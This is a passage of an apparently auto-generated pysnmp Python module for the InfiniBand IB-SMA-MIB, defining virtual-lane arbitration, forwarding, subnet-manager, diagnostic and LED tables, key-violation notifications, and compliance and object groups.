ibSmaVLArbitInfo = MibIdentifier((1, 3, 6, 1, 3, 117, 3, 1, 8))
ibSmaHiPriVlArbTable = MibTable((1, 3, 6, 1, 3, 117, 3, 1, 8, 1), )
if mibBuilder.loadTexts: ibSmaHiPriVlArbTable.setStatus('current')
ibSmaHiPriVlArbEntry = MibTableRow((1, 3, 6, 1, 3, 117, 3, 1, 8, 1, 1), ).setIndexNames((0, "IB-SMA-MIB", "ibSmaHiPriIBAPortIndex"), (0, "IB-SMA-MIB", "ibSmaHiPriNIndex"))
if mibBuilder.loadTexts: ibSmaHiPriVlArbEntry.setStatus('current')
ibSmaHiPriIBAPortIndex = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 8, 1, 1, 1), IbDataPort())
if mibBuilder.loadTexts: ibSmaHiPriIBAPortIndex.setStatus('current')
ibSmaHiPriNIndex = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 8, 1, 1, 2), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(1, 64)))
if mibBuilder.loadTexts: ibSmaHiPriNIndex.setStatus('current')
ibSmaHiPriVirtLane = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 8, 1, 1, 3), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 14))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaHiPriVirtLane.setStatus('current')
ibSmaHiPriWeight = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 8, 1, 1, 4), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaHiPriWeight.setStatus('current')
ibSmaLowPriVlArbTable = MibTable((1, 3, 6, 1, 3, 117, 3, 1, 8, 2), )
if mibBuilder.loadTexts: ibSmaLowPriVlArbTable.setStatus('current')
ibSmaLowPriVlArbEntry = MibTableRow((1, 3, 6, 1, 3, 117, 3, 1, 8, 2, 1), ).setIndexNames((0, "IB-SMA-MIB", "ibSmaLowPriIBAPortIndex"), (0, "IB-SMA-MIB", "ibSmaLowPriNIndex"))
if mibBuilder.loadTexts: ibSmaLowPriVlArbEntry.setStatus('current')
ibSmaLowPriIBAPortIndex = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 8, 2, 1, 1), IbDataPort())
if mibBuilder.loadTexts: ibSmaLowPriIBAPortIndex.setStatus('current')
ibSmaLowPriNIndex = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 8, 2, 1, 2), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(1, 64)))
if mibBuilder.loadTexts: ibSmaLowPriNIndex.setStatus('current')
ibSmaLowPriVirtLane = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 8, 2, 1, 3), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 14))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaLowPriVirtLane.setStatus('current')
ibSmaLowPriWeight = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 8, 2, 1, 4), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaLowPriWeight.setStatus('current')
ibSmaLFTInfo = MibIdentifier((1, 3, 6, 1, 3, 117, 3, 1, 9))
ibSmaLinForTable = MibTable((1, 3, 6, 1, 3, 117, 3, 1, 9, 1), )
if mibBuilder.loadTexts: ibSmaLinForTable.setStatus('current')
ibSmaLinForEntry = MibTableRow((1, 3, 6, 1, 3, 117, 3, 1, 9, 1, 1), ).setIndexNames((0, "IB-SMA-MIB", "ibSmaLinDestDLIDIndex"))
if mibBuilder.loadTexts: ibSmaLinForEntry.setStatus('current')
ibSmaLinDestDLIDIndex = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 9, 1, 1, 1), IbUnicastLid())
if mibBuilder.loadTexts: ibSmaLinDestDLIDIndex.setStatus('current')
ibSmaLinForwEgressPort = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 9, 1, 1, 2), IbDataPortAndInvalid()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaLinForwEgressPort.setStatus('current')
ibSmaRFTInfo = MibIdentifier((1, 3, 6, 1, 3, 117, 3, 1, 10))
ibSmaRandomForwardingTable = MibTable((1, 3, 6, 1, 3, 117, 3, 1, 10, 1), )
if mibBuilder.loadTexts: ibSmaRandomForwardingTable.setStatus('current')
ibSmaRandomForwardingEntry = MibTableRow((1, 3, 6, 1, 3, 117, 3, 1, 10, 1, 1), ).setIndexNames((0, "IB-SMA-MIB", "ibSmaRandomForwardingPortIndex"))
if mibBuilder.loadTexts: ibSmaRandomForwardingEntry.setStatus('current')
ibSmaRandomForwardingPortIndex = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 10, 1, 1, 1), IbDataPort())
if mibBuilder.loadTexts: ibSmaRandomForwardingPortIndex.setStatus('current')
ibSmaRandomDestLID = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 10, 1, 1, 2), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(1, 49152))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaRandomDestLID.setStatus('current')
ibSmaRandomForwEgressPort = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 10, 1, 1, 3), IbDataPort()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaRandomForwEgressPort.setStatus('current')
ibSmaRandomLMC = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 10, 1, 1, 4), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 7))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaRandomLMC.setStatus('current')
ibSmaRandomIsValid = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 10, 1, 1, 5), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaRandomIsValid.setStatus('current')
ibSmaMFTInfo = MibIdentifier((1, 3, 6, 1, 3, 117, 3, 1, 11))
ibSmaMulForTable = MibTable((1, 3, 6, 1, 3, 117, 3, 1, 11, 1), )
if mibBuilder.loadTexts: ibSmaMulForTable.setStatus('current')
ibSmaMulForEntry = MibTableRow((1, 3, 6, 1, 3, 117, 3, 1, 11, 1, 1), ).setIndexNames((0, "IB-SMA-MIB", "ibSmaMulDestDLIDIndex"))
if mibBuilder.loadTexts: ibSmaMulForEntry.setStatus('current')
ibSmaMulDestDLIDIndex = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 11, 1, 1, 1), IbMulticastLid())
if mibBuilder.loadTexts: ibSmaMulDestDLIDIndex.setStatus('current')
ibSmaMulForwMask = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 11, 1, 1, 2), IbSmPortList()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaMulForwMask.setStatus('current')
ibSmaSMInfo = MibIdentifier((1, 3, 6, 1, 3, 117, 3, 1, 12))
ibSmaSubMgrInfo = MibIdentifier((1, 3, 6, 1, 3, 117, 3, 1, 12, 1))
ibSmaSmInfoTable = MibTable((1, 3, 6, 1, 3, 117, 3, 1, 12, 1, 1), )
if mibBuilder.loadTexts: ibSmaSmInfoTable.setStatus('current')
ibSmaSmInfoEntry = MibTableRow((1, 3, 6, 1, 3, 117, 3, 1, 12, 1, 1, 1), ).setIndexNames((0, "IB-SMA-MIB", "ibSmaSmInfoPortIndex"))
if mibBuilder.loadTexts: ibSmaSmInfoEntry.setStatus('current')
ibSmaSmInfoPortIndex = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 12, 1, 1, 1, 1), IbDataPort())
if mibBuilder.loadTexts: ibSmaSmInfoPortIndex.setStatus('current')
ibSmaSmGuid = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 12, 1, 1, 1, 2), IbGuid()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaSmGuid.setStatus('current')
ibSmaSmSmKey = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 12, 1, 1, 1, 3), OctetString().subtype(subtypeSpec=ValueSizeConstraint(8, 8)).setFixedLength(8)).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaSmSmKey.setStatus('current')
ibSmaSmSmpCount = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 12, 1, 1, 1, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaSmSmpCount.setStatus('current')
ibSmaSmPriority = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 12, 1, 1, 1, 5), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 15))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaSmPriority.setStatus('current')
ibSmaSmState = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 12, 1, 1, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("notActive", 1), ("discovering", 2), ("standby", 3), ("master", 4), ("unknown", 5)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaSmState.setStatus('current')
ibSmaVendDiagInfo = MibIdentifier((1, 3, 6, 1, 3, 117, 3, 1, 13))
ibSmaVendDiagInfoTable = MibTable((1, 3, 6, 1, 3, 117, 3, 1, 13, 1), )
if mibBuilder.loadTexts: ibSmaVendDiagInfoTable.setStatus('current')
ibSmaVendDiagInfoEntry = MibTableRow((1, 3, 6, 1, 3, 117, 3, 1, 13, 1, 1), ).setIndexNames((0, "IB-SMA-MIB", "ibSmaVendDiagPortIndex"))
if mibBuilder.loadTexts: ibSmaVendDiagInfoEntry.setStatus('current')
ibSmaVendDiagPortIndex = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 13, 1, 1, 1), IbDataPortAndInvalid())
if mibBuilder.loadTexts: ibSmaVendDiagPortIndex.setStatus('current')
ibSmaPortGenericDiagCode = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 13, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("portReady", 1), ("performingSelfTest", 2), ("initializing", 3), ("softError", 4), ("hardError", 5), ("other", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortGenericDiagCode.setStatus('current')
ibSmaPortVendorDiagCode = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 13, 1, 1, 3), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 2047))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortVendorDiagCode.setStatus('current')
ibSmaPortVendorDiagIndexFwd = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 13, 1, 1, 4), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortVendorDiagIndexFwd.setStatus('current')
ibSmaPortVendorDiagData = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 13, 1, 1, 5), OctetString().subtype(subtypeSpec=ValueSizeConstraint(124, 124)).setFixedLength(124)).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaPortVendorDiagData.setStatus('current')
ibSmaLedInfo = MibIdentifier((1, 3, 6, 1, 3, 117, 3, 1, 14))
ibSmaLedInfoTable = MibTable((1, 3, 6, 1, 3, 117, 3, 1, 14, 1), )
if mibBuilder.loadTexts: ibSmaLedInfoTable.setStatus('current')
ibSmaLedInfoEntry = MibTableRow((1, 3, 6, 1, 3, 117, 3, 1, 14, 1, 1), ).setIndexNames((0, "IB-SMA-MIB", "ibSmaLedIndex"))
if mibBuilder.loadTexts: ibSmaLedInfoEntry.setStatus('current')
ibSmaLedIndex = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 14, 1, 1, 1), IbDataPort())
if mibBuilder.loadTexts: ibSmaLedIndex.setStatus('current')
ibSmaLedState = MibTableColumn((1, 3, 6, 1, 3, 117, 3, 1, 14, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("unknown", 1), ("on", 2), ("off", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: ibSmaLedState.setStatus('current')
ibSmaNotificationPrefix = MibIdentifier((1, 3, 6, 1, 3, 117, 3, 2, 0))
ibSmaPortLinkStateChange = NotificationType((1, 3, 6, 1, 3, 117, 3, 2, 0, 1)).setObjects(("IB-SMA-MIB", "ibSmaNodeLid"))
if mibBuilder.loadTexts: ibSmaPortLinkStateChange.setStatus('current')
ibSmaLinkIntegrityThresReached = NotificationType((1, 3, 6, 1, 3, 117, 3, 2, 0, 2)).setObjects(("IB-SMA-MIB", "ibSmaNodeLid"), ("IB-SMA-MIB", "ibSmaNodePortNum"))
if mibBuilder.loadTexts: ibSmaLinkIntegrityThresReached.setStatus('current')
ibSmaExcessBuffOverrunThres = NotificationType((1, 3, 6, 1, 3, 117, 3, 2, 0, 3)).setObjects(("IB-SMA-MIB", "ibSmaNodeLid"), ("IB-SMA-MIB", "ibSmaNodePortNum"))
if mibBuilder.loadTexts: ibSmaExcessBuffOverrunThres.setStatus('current')
ibSmaFlowCntrlUpdateTimerExpire = NotificationType((1, 3, 6, 1, 3, 117, 3, 2, 0, 4)).setObjects(("IB-SMA-MIB", "ibSmaNodeLid"), ("IB-SMA-MIB", "ibSmaNodePortNum"))
if mibBuilder.loadTexts: ibSmaFlowCntrlUpdateTimerExpire.setStatus('current')
ibSmaCapabilityMaskModified = NotificationType((1, 3, 6, 1, 3, 117, 3, 2, 0, 5)).setObjects(("IB-SMA-MIB", "ibSmaNodeLid"), ("IB-SMA-MIB", "ibSmaNodeCapMask"))
if mibBuilder.loadTexts: ibSmaCapabilityMaskModified.setStatus('current')
ibSmaSysImageGuidModified = NotificationType((1, 3, 6, 1, 3, 117, 3, 2, 0, 6)).setObjects(("IB-SMA-MIB", "ibSmaNodeLid"), ("IB-SMA-MIB", "ibSmaSystemImageGuid"))
if mibBuilder.loadTexts: ibSmaSysImageGuidModified.setStatus('current')
ibSmaBadManagementKey = NotificationType((1, 3, 6, 1, 3, 117, 3, 2, 0, 7)).setObjects(("IB-SMA-MIB", "ibSmaNodeKey"), ("IB-SMA-MIB", "ibSmaNodeLid"), ("IB-SMA-MIB", "ibSmaNodeMethod"), ("IB-SMA-MIB", "ibSmaNodeAttributeId"), ("IB-SMA-MIB", "ibSmaNodeAttributeModifier"))
if mibBuilder.loadTexts: ibSmaBadManagementKey.setStatus('current')
ibSmaBadPartitionKey = NotificationType((1, 3, 6, 1, 3, 117, 3, 2, 0, 8)).setObjects(("IB-SMA-MIB", "ibSmaNodeKey"), ("IB-SMA-MIB", "ibSmaNodeLid"), ("IB-SMA-MIB", "ibSmaNodeGid1"), ("IB-SMA-MIB", "ibSmaNodeQueuePair1"), ("IB-SMA-MIB", "ibSmaNodeLid2"), ("IB-SMA-MIB", "ibSmaNodeGid2"), ("IB-SMA-MIB", "ibSmaNodeQueuePair2"), ("IB-SMA-MIB", "ibSmaNodeServiceLevel"))
if mibBuilder.loadTexts: ibSmaBadPartitionKey.setStatus('current')
ibSmaBadQueueKey = NotificationType((1, 3, 6, 1, 3, 117, 3, 2, 0, 9)).setObjects(("IB-SMA-MIB", "ibSmaNodeKey"), ("IB-SMA-MIB", "ibSmaNodeLid"), ("IB-SMA-MIB", "ibSmaNodeGid1"), ("IB-SMA-MIB", "ibSmaNodeQueuePair1"), ("IB-SMA-MIB", "ibSmaNodeLid2"), ("IB-SMA-MIB", "ibSmaNodeGid2"), ("IB-SMA-MIB", "ibSmaNodeQueuePair2"), ("IB-SMA-MIB", "ibSmaNodeServiceLevel"))
if mibBuilder.loadTexts: ibSmaBadQueueKey.setStatus('current')
ibSmaBadPKeyAtSwitchPort = NotificationType((1, 3, 6, 1, 3, 117, 3, 2, 0, 10)).setObjects(("IB-SMA-MIB", "ibSmaNodeKey"), ("IB-SMA-MIB", "ibSmaNodeLid"), ("IB-SMA-MIB", "ibSmaNodeGid1"), ("IB-SMA-MIB", "ibSmaNodeQueuePair1"), ("IB-SMA-MIB", "ibSmaNodeLid2"), ("IB-SMA-MIB", "ibSmaNodeGid2"), ("IB-SMA-MIB", "ibSmaNodeQueuePair2"), ("IB-SMA-MIB", "ibSmaNodeServiceLevel"), ("IB-SMA-MIB", "ibSmaNodeSwitchLid"), ("IB-SMA-MIB", "ibSmaNodeDataValid"))
if mibBuilder.loadTexts: ibSmaBadPKeyAtSwitchPort.setStatus('current')
ibSmaCompliances = MibIdentifier((1, 3, 6, 1, 3, 117, 3, 3, 1))
ibSmaGroups = MibIdentifier((1, 3, 6, 1, 3, 117, 3, 3, 2))
ibSmaBasicNodeCompliance = ModuleCompliance((1, 3, 6, 1, 3, 117, 3, 3, 1, 1)).setObjects(("IB-SMA-MIB", "ibSmaNodeGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ibSmaBasicNodeCompliance = ibSmaBasicNodeCompliance.setStatus('current')
ibSmaFullSwitchCompliance = ModuleCompliance((1, 3, 6, 1, 3, 117, 3, 3, 1, 2)).setObjects(("IB-SMA-MIB", "ibSmaNodeGroup"), ("IB-SMA-MIB", "ibSmaSwitchGroup"), ("IB-SMA-MIB", "ibSmaGuidGroup"), ("IB-SMA-MIB", "ibSmaMgmtPortGroup"), ("IB-SMA-MIB", "ibSmaDataPortGroup"), ("IB-SMA-MIB", "ibSmaPKeyGroup"), ("IB-SMA-MIB", "ibSmaSlToVlMapGroup"), ("IB-SMA-MIB", "ibSmaVLArbitGroup"), ("IB-SMA-MIB", "ibSmaLFTGroup"), ("IB-SMA-MIB", "ibSmaRFTGroup"), ("IB-SMA-MIB", "ibSmaMFTGroup"), ("IB-SMA-MIB", "ibSmaSMGroup"), ("IB-SMA-MIB", "ibSmaVendDiagGroup"), ("IB-SMA-MIB", "ibSmaLedGroup"), ("IB-SMA-MIB", "ibSmaNotificationsGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ibSmaFullSwitchCompliance = ibSmaFullSwitchCompliance.setStatus('current')
ibSmaFullRouterCACompliance = ModuleCompliance((1, 3, 6, 1, 3, 117, 3, 3, 1, 3)).setObjects(("IB-SMA-MIB", "ibSmaNodeGroup"), ("IB-SMA-MIB", "ibSmaGuidGroup"), ("IB-SMA-MIB", "ibSmaMgmtPortGroup"), ("IB-SMA-MIB", "ibSmaDataPortGroup"), ("IB-SMA-MIB", "ibSmaPKeyGroup"), ("IB-SMA-MIB", "ibSmaSlToVlMapGroup"), ("IB-SMA-MIB", "ibSmaVLArbitGroup"), ("IB-SMA-MIB", "ibSmaSMGroup"), ("IB-SMA-MIB", "ibSmaVendDiagGroup"), ("IB-SMA-MIB", "ibSmaLedGroup"), ("IB-SMA-MIB", "ibSmaNotificationsGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ibSmaFullRouterCACompliance = ibSmaFullRouterCACompliance.setStatus('current')
ibSmaNodeGroup = ObjectGroup((1, 3, 6, 1, 3, 117, 3, 3, 2, 1)).setObjects(("IB-SMA-MIB", "ibSmaNodeString"), ("IB-SMA-MIB", "ibSmaNodeBaseVersion"), ("IB-SMA-MIB", "ibSmaNodeClassVersion"), ("IB-SMA-MIB", "ibSmaNodeType"), ("IB-SMA-MIB", "ibSmaNodeNumPorts"), ("IB-SMA-MIB", "ibSmaSystemImageGuid"), ("IB-SMA-MIB", "ibSmaNodeGuid"), ("IB-SMA-MIB", "ibSmaNodePortGuid"), ("IB-SMA-MIB", "ibSmaNodePartitionTableNum"), ("IB-SMA-MIB", "ibSmaNodeDeviceId"), ("IB-SMA-MIB", "ibSmaNodeRevision"), ("IB-SMA-MIB", "ibSmaNodeLocalPortNumOrZero"), ("IB-SMA-MIB", "ibSmaNodeVendorId"), ("IB-SMA-MIB", "ibSmaNodeLid"), ("IB-SMA-MIB", "ibSmaNodePortNum"), ("IB-SMA-MIB", "ibSmaNodeMethod"), ("IB-SMA-MIB", "ibSmaNodeAttributeId"), ("IB-SMA-MIB", "ibSmaNodeAttributeModifier"), ("IB-SMA-MIB", "ibSmaNodeKey"), ("IB-SMA-MIB", "ibSmaNodeLid2"), ("IB-SMA-MIB", "ibSmaNodeServiceLevel"), ("IB-SMA-MIB", "ibSmaNodeQueuePair1"), ("IB-SMA-MIB", "ibSmaNodeQueuePair2"), ("IB-SMA-MIB", "ibSmaNodeGid1"), ("IB-SMA-MIB", "ibSmaNodeGid2"), ("IB-SMA-MIB", "ibSmaNodeCapMask"), ("IB-SMA-MIB", "ibSmaNodeSwitchLid"), ("IB-SMA-MIB", "ibSmaNodeDataValid"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ibSmaNodeGroup = ibSmaNodeGroup.setStatus('current')
ibSmaSwitchGroup = ObjectGroup((1, 3, 6, 1, 3, 117, 3, 3, 2, 2)).setObjects(("IB-SMA-MIB", "ibSmaSwLinearFdbTableNum"), ("IB-SMA-MIB", "ibSmaSwRandomFdbTableNum"), ("IB-SMA-MIB", "ibSmaSwMulticastFdbTableNum"), ("IB-SMA-MIB", "ibSmaSwLinearFdbTop"), ("IB-SMA-MIB", "ibSmaSwDefaultPort"), ("IB-SMA-MIB", "ibSmaSwDefMcastPriPort"), ("IB-SMA-MIB", "ibSmaSwDefMcastNotPriPort"), ("IB-SMA-MIB", "ibSmaSwLifeTimeValue"), ("IB-SMA-MIB", "ibSmaSwPortStateChange"), ("IB-SMA-MIB", "ibSmaSwLidsPerPort"), ("IB-SMA-MIB", "ibSmaSwPartitionEnforceNum"), ("IB-SMA-MIB", "ibSmaSwInboundEnforceCap"), ("IB-SMA-MIB", "ibSmaSwOutboundEnforceCap"), ("IB-SMA-MIB", "ibSmaSwFilterRawPktInputCap"), ("IB-SMA-MIB", "ibSmaSwFilterRawPktOutputCap"), ("IB-SMA-MIB", "ibSmaSwEnhancedPort0"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ibSmaSwitchGroup = ibSmaSwitchGroup.setStatus('current')
ibSmaGuidGroup = ObjectGroup((1, 3, 6, 1, 3, 117, 3, 3, 2, 3)).setObjects(("IB-SMA-MIB", "ibSmaGuidVal"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ibSmaGuidGroup = ibSmaGuidGroup.setStatus('current')
ibSmaMgmtPortGroup = ObjectGroup((1, 3, 6, 1, 3, 117, 3, 3, 2, 4)).setObjects(("IB-SMA-MIB", "ibSmaPortMKey"), ("IB-SMA-MIB", "ibSmaPortGidPrefix"), ("IB-SMA-MIB", "ibSmaPortLid"), ("IB-SMA-MIB", "ibSmaPortMasterSmLid"), ("IB-SMA-MIB", "ibSmaPortIsSubnetManager"), ("IB-SMA-MIB", "ibSmaPortIsNoticeSupported"), ("IB-SMA-MIB", "ibSmaPortIsTrapSupported"), ("IB-SMA-MIB", "ibSmaPortIsAutoMigrateSupported"), ("IB-SMA-MIB", "ibSmaPortIsSlMappingSupported"), ("IB-SMA-MIB", "ibSmaPortIsMKeyNvram"), ("IB-SMA-MIB", "ibSmaPortIsPKeyNvram"), ("IB-SMA-MIB", "ibSmaPortIsLedInfoSupported"), ("IB-SMA-MIB", "ibSmaPortIsSmDisabled"), ("IB-SMA-MIB", "ibSmaPortIsSysImgGuidSupported"), ("IB-SMA-MIB", "ibSmaPortIsPKeyExtPortTrapSup"), ("IB-SMA-MIB", "ibSmaPortIsCommManageSupported"), ("IB-SMA-MIB", "ibSmaPortIsSnmpTunnelSupported"), ("IB-SMA-MIB", "ibSmaPortIsReinitSupported"), ("IB-SMA-MIB", "ibSmaPortIsDevManageSupported"), ("IB-SMA-MIB", "ibSmaPortIsVendorClassSupported"), ("IB-SMA-MIB", "ibSmaPortIsDrNoticeSupported"), ("IB-SMA-MIB", "ibSmaPortIsCapMaskNoticSupported"), ("IB-SMA-MIB", "ibSmaPortIsBootMgmtSupported"), ("IB-SMA-MIB", "ibSmaPortMKeyLeasePeriod"), ("IB-SMA-MIB", "ibSmaPortMKeyProtectBits"), ("IB-SMA-MIB", "ibSmaPortMasterSmSl"), ("IB-SMA-MIB", "ibSmaPortInitTypeLoad"), ("IB-SMA-MIB", "ibSmaPortInitTypeContent"), ("IB-SMA-MIB", "ibSmaPortInitTypePresence"), ("IB-SMA-MIB", "ibSmaPortInitTypeResuscitate"), ("IB-SMA-MIB", "ibSmaPortInitNoLoadReply"), ("IB-SMA-MIB", "ibSmaPortInitPreserveContReply"), ("IB-SMA-MIB", "ibSmaPortInitPreservePresReply"), ("IB-SMA-MIB", "ibSmaPortMKeyViolations"), ("IB-SMA-MIB", "ibSmaPortPKeyViolations"), ("IB-SMA-MIB", "ibSmaPortQKeyViolations"), ("IB-SMA-MIB", "ibSmaPortNumGuid"), ("IB-SMA-MIB", "ibSmaPortSubnetTimeout"), ("IB-SMA-MIB", "ibSmaPortResponseTimeValue"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ibSmaMgmtPortGroup = ibSmaMgmtPortGroup.setStatus('current')
ibSmaDataPortGroup = ObjectGroup((1, 3, 6, 1, 3, 117, 3, 3, 2, 5)).setObjects(("IB-SMA-MIB", "ibSmaPortLinkWidthEnabled"), ("IB-SMA-MIB", "ibSmaPortLinkWidthSupported"), ("IB-SMA-MIB", "ibSmaPortLinkWidthActive"), ("IB-SMA-MIB", "ibSmaPortLinkSpeedSupported"), ("IB-SMA-MIB", "ibSmaPortLinkState"), ("IB-SMA-MIB", "ibSmaPortPhysState"), ("IB-SMA-MIB", "ibSmaPortLinkDownDefaultState"), ("IB-SMA-MIB", "ibSmaPortLidMaskCount"), ("IB-SMA-MIB", "ibSmaPortLinkSpeedActive"), ("IB-SMA-MIB", "ibSmaPortLinkSpeedEnabled"), ("IB-SMA-MIB", "ibSmaPortNeighborMtu"), ("IB-SMA-MIB", "ibSmaPortVirtLaneSupport"), ("IB-SMA-MIB", "ibSmaPortVlHighPriorityLimit"), ("IB-SMA-MIB", "ibSmaPortVlArbHighCapacity"), ("IB-SMA-MIB", "ibSmaPortVlArbLowCapacity"), ("IB-SMA-MIB", "ibSmaPortMtuCapacity"), ("IB-SMA-MIB", "ibSmaPortVlStallCount"), ("IB-SMA-MIB", "ibSmaPortHeadOfQueueLife"), ("IB-SMA-MIB", "ibSmaPortOperationalVls"), ("IB-SMA-MIB", "ibSmaPortPartEnforceInbound"), ("IB-SMA-MIB", "ibSmaPortPartEnforceOutbound"), ("IB-SMA-MIB", "ibSmaPortFilterRawPktInbound"), ("IB-SMA-MIB", "ibSmaPortFilterRawPktOutbound"), ("IB-SMA-MIB", "ibSmaPortLocalPhysErrorThreshold"), ("IB-SMA-MIB", "ibSmaPortOverrunErrorThreshold"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ibSmaDataPortGroup = ibSmaDataPortGroup.setStatus('current')
ibSmaPKeyGroup = ObjectGroup((1, 3, 6, 1, 3, 117, 3, 3, 2, 6)).setObjects(("IB-SMA-MIB", "ibSmaPKeyMembership"), ("IB-SMA-MIB", "ibSmaPKeyBase"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ibSmaPKeyGroup = ibSmaPKeyGroup.setStatus('current')
ibSmaSlToVlMapGroup = ObjectGroup((1, 3, 6, 1, 3, 117, 3, 3, 2, 7)).setObjects(("IB-SMA-MIB", "ibSmaVirtualLane"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ibSmaSlToVlMapGroup = ibSmaSlToVlMapGroup.setStatus('current')
ibSmaVLArbitGroup = ObjectGroup((1, 3, 6, 1, 3, 117, 3, 3, 2, 8)).setObjects(("IB-SMA-MIB", "ibSmaHiPriVirtLane"), ("IB-SMA-MIB", "ibSmaHiPriWeight"), ("IB-SMA-MIB", "ibSmaLowPriVirtLane"), ("IB-SMA-MIB", "ibSmaLowPriWeight"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ibSmaVLArbitGroup = ibSmaVLArbitGroup.setStatus('current')
ibSmaLFTGroup = ObjectGroup((1, 3, 6, 1, 3, 117, 3, 3, 2, 9)).setObjects(("IB-SMA-MIB", "ibSmaLinForwEgressPort"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ibSmaLFTGroup = ibSmaLFTGroup.setStatus('current')
ibSmaRFTGroup = ObjectGroup((1, 3, 6, 1, 3, 117, 3, 3, 2, 10)).setObjects(("IB-SMA-MIB", "ibSmaRandomDestLID"), ("IB-SMA-MIB", "ibSmaRandomForwEgressPort"), ("IB-SMA-MIB", "ibSmaRandomLMC"), ("IB-SMA-MIB", "ibSmaRandomIsValid"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ibSmaRFTGroup = ibSmaRFTGroup.setStatus('current')
ibSmaMFTGroup = ObjectGroup((1, 3, 6, 1, 3, 117, 3, 3, 2, 11)).setObjects(("IB-SMA-MIB", "ibSmaMulForwMask"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ibSmaMFTGroup = ibSmaMFTGroup.setStatus('current')
ibSmaSMGroup = ObjectGroup((1, 3, 6, 1, 3, 117, 3, 3, 2, 12)).setObjects(("IB-SMA-MIB", "ibSmaSmGuid"), ("IB-SMA-MIB", "ibSmaSmSmKey"), ("IB-SMA-MIB", "ibSmaSmSmpCount"), ("IB-SMA-MIB", "ibSmaSmPriority"), ("IB-SMA-MIB", "ibSmaSmState"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
